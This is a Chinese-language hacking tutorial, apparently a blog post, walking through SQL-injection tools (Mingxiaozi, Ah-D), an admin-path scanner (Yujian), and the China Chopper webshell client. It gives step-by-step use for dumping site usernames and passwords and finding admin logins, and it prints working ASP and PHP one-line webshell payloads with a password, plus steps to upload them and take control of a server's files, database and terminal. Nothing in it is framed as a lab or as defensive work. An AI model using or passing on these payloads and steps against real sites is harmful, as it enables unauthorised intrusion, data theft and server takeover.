明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马

明小子：

明小子主要功能为“SQL注入猜解”，手工猜测太过繁琐，使用明小子可以检测是否存在注入点，猜解表名，列名和字段数据（用户名和密码）

使用：

1.单击工具中的“SQL注入猜解”，输入网站地址，检测是否存在注入点。

2.点击“猜解表名”，猜出数据库表名

3.选定猜解出的表名，猜解表中字段名和字段值

4.猜解后台地址，使用猜到的用户名和密码进行登陆

啊D注入工具：

1、扫描注入点

使用啊D对网站进行扫描，输入网址就行

2、SQL注入检测

检测已知可以注入的链接

3、管理入口检测

检测网站登陆的入口点，如果已经得到用户名和密码的话，可以用这个扫描一下，看能否找到后台进行登陆

4、浏览网页

可以用这个浏览网页，如果遇到网页中存在可以注入的链接将提示



御剑：

御剑后台扫描枚举可能的后台路径 找到后台看是啥系统可以爆库或者利用漏洞进后台就简单多了



1.输入目标站点的url，点击扫描

2.扫描结果分析：

HTTP响应值为200,代表页面可以访问

双击链接http://../index.asp，进入目标站点主页

双击链接http://../admin/login.asp, 进入后台管理页面  （扫描网站登录后台）

双击链接http://../FCKeditor/admin_login.html,该站点的编辑器类型为FCK以及版本号  （扫描编辑器登录后台）

中国菜刀：

下载地址：http://www.onlinedown.net/soft/588101.htm

1.中国菜刀支持的服务端脚本：PHP、ASP，主要用于连接一句话木马。

2.主要功能有：文件管理（有足够的权限时候可以管理整个磁盘/文件系统），数据库管理，虚拟终端。
常用的一句话木马：

asp的一句话是：<%eval request("lubr")%>

php的一句话是：<?php @eval($_POST['lubr']);?>



使用：

1.上传一句话木马，记录木马地址，例如http://192.168.1.3:8080/up/images/lubr.php

2.菜刀连接：

进入中国菜刀目录，点击chopper.exe

右键点击添加，在地址栏中添加上传文件路径，右侧添加密码lubr, 脚本类型选择PHP



右键点击文件管理，查看目标服务器的完整目录，可进行创建文件，修改文件，上传下载等操作，如上传大马。